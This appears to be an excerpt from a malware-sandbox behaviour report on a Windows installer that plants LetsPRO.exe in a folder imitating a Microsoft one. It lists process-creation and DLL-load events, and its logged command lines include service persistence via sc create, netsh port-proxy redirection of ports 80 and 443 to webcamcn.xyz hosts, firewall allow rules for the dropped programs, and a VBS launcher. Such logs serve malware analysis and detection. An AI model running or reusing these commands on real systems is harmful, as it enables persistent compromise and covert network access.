                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\ChromeSetup.exeProcess created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe cscript C:\Users\user\99944\144977.vbs
                  Source: unknownProcess created: C:\Windows\System32\sc.exe sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
                  Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
                  Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /t /im wegame.exe
                  Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /t /im WeGame.exe
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ChromeSetup.exe "C:\Program Files (x86)\ChromeSetup.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeProcess created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: dinput8.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: devenum.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msdmo.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeSection loaded: kernel.appcore.dllJump to behavior
